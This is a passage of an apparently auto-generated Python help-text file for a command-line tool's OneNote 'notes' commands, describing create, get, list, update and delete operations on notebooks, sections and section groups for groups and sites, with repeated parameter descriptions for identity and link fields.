--created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property onenote for sites" """ helps['notes get-onenote'] = """ type: command short-summary: "Get onenote from sites" """ helps['notes update-onenote'] = """ type: command short-summary: "Update the navigation property onenote in sites" parameters: - name: --resources short-summary: "The image and other file resources in OneNote pages. Getting a resources collection is not \ supported, but you can get the binary content of a specific resource. Read-only. Nullable." long-summary: | Usage: --resources content=XX content-url=XX self=XX id=XX content: The content stream content-url: The URL for downloading the content self: The endpoint where you can get details about the page. Read-only. id: Read-only. Multiple actions can be specified by using more than one --resources argument. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-notebook'] = """ type: command short-summary: "Create new navigation property to notebooks for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes create-operation'] = """ type: command short-summary: "Create new navigation property to operations for sites" parameters: - name: --error short-summary: "onenoteOperationError" long-summary: | Usage: --error code=XX message=XX code: The error code. message: The error message. """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes create-resource'] = """ type: command short-summary: "Create new navigation property to resources for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-notebook'] = """ type: command short-summary: "Get notebooks from sites" """ helps['notes get-operation'] = """ type: command short-summary: "Get operations from sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-resource'] = """ type: command short-summary: "Get resources from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-notebook'] = """ type: command short-summary: "Get notebooks from sites" """ helps['notes list-operation'] = """ type: command short-summary: "Get operations from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes list-resource'] = """ type: command short-summary: "Get resources from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-notebook'] = """ type: command short-summary: "Update the navigation property notebooks in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-operation'] = """ type: command short-summary: "Update the navigation property operations in sites" parameters: - name: --error short-summary: "onenoteOperationError" long-summary: | Usage: --error code=XX message=XX code: The error code. message: The error message. """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-resource'] = """ type: command short-summary: "Update the navigation property resources in sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for 